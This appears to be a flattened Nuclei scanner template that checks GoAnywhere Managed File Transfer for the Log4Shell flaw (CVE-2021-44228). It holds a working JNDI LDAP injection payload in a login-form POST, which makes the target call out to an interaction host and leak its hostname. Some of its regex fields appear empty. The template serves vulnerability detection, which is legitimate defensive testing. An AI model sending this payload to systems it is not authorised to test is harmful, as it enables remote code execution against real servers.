id: goanywhere-mft-log4j-rce info: name: GoAnywhere Managed File Transfer - Remote Code Execution (Apache Log4j) author: pussycat0x severity: critical description: GoAnywhere Managed File Transfer is vulnerable to a remote command execution (RCE) issue via the included Apache Log4j. reference: - https://www.goanywhere.com/cve-2021-44228-and-cve-2021-45046-goanywhere-mitigation-steps - https://logging.apache.org/log4j/2.x/security.html - https://nvd.nist.gov/vuln/detail/CVE-2021-44228 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2021-44228 cwe-id: CWE-77 metadata: verified: true max-request: 2 shodan-query: http.html:"GoAnywhere Managed File Transfer" tags: cve,cve2021,jndi,log4j,rce,oast,goanywhere,kev variables: rand1: '{{rand_int(111, 999)}}' rand2: '{{rand_int(111, 999)}}' http: - raw: - | GET /goanywhere/auth/Login.xhtml HTTP/1.1 Host: {{Hostname}} - | POST /goanywhere/auth/Login.xhtml HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Origin: {{RootURL}} Referer: {{RootURL}}/goanywhere/auth/Login.xhtml formPanel%3AloginGrid%3Aname=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.name.{{interactsh-url}}}&formPanel%3AloginGrid%3Avalue_hinput=pass&formPanel%3AloginGrid%3Avalue={{view}}}&formPanel%3AloginGrid%3AloginButton=&loginForm_SUBMIT=1&javax.faces.ViewState={{view}} cookie-reuse: true matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - type: regex part: interactsh_request regex: extractors: - type: regex name: view group: 1 regex: - 'javax\.faces\.ViewState:1" value="(.*)" autocomplete' internal: true part: body - type: kval kval: - type: regex group: 2 regex: part: interactsh_request - type: regex group: 1 regex: part: interactsh_request # digest: 490a0046304402201afb2e9417d23c2ea5368ccdfa0445cf3517d34b8db7f1b1d1a7defdb6cfa2cb022003c6ba2ee9d8d3d0eae58e5dc118e86f51e2a8ce68176a5012c83c0e3edd0b67:922c64590222798bb761d5b6d8e72950